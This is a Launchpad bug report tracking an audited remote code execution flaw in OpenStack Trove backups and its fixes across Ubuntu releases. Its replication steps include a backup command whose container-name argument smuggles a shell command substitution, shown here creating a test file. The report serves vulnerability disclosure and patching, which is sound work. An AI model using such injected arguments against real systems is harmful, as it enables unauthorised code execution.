Remote code execution: Trove backup
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
openstack-trove (Ubuntu) |
Fix Released
|
High
|
Unassigned | ||
Jammy |
Fix Released
|
High
|
Unassigned | ||
Lunar |
Fix Released
|
High
|
Unassigned | ||
Mantic |
Fix Released
|
High
|
Unassigned |
Bug Description
Note: Details taken from https:/
An external security audit by Adam Bell, CyberCX New Zealand (conducted for Catalyst Cloud) has identified a Remote Code Execution security issue in Trove.
During a Trove instance backup command, it is possible to pass through extra arguments via guestagent to docker, and utilize a subprocess shell within backup python code to perform a Remote Code Execution within the Trove backup container.
Replication steps:
1) Create mysql database instance.
2) Issue a backup command using the following: $ openstack database backup create --instance rce-db1 --swift-container 'test --db-user="$(touch /rce_successful
Validation of the RCE can be observed from within the Trove VM:
root@rce-db1:~# docker cp db_backup:
root@rce-db1:~# ls -l rce_successful.txt
-rw-r--r-- 1 root root 0 Apr 20 04:20 rce_successful.txt
The executed touch command above can be replaced with any shell actions, including apt.
Changed in openstack-trove (Ubuntu Lunar): | |
status: | New → Fix Released |
Changed in openstack-trove (Ubuntu Mantic): | |
status: | New → Fix Released |
Changed in openstack-trove (Ubuntu Jammy): | |
status: | New → Triaged |
importance: | Undecided → High |
Changed in openstack-trove (Ubuntu Lunar): | |
importance: | Undecided → High |
Changed in openstack-trove (Ubuntu Mantic): | |
importance: | Undecided → High |
https:/ /ubuntu. com/security/ notices/ USN-6245- 1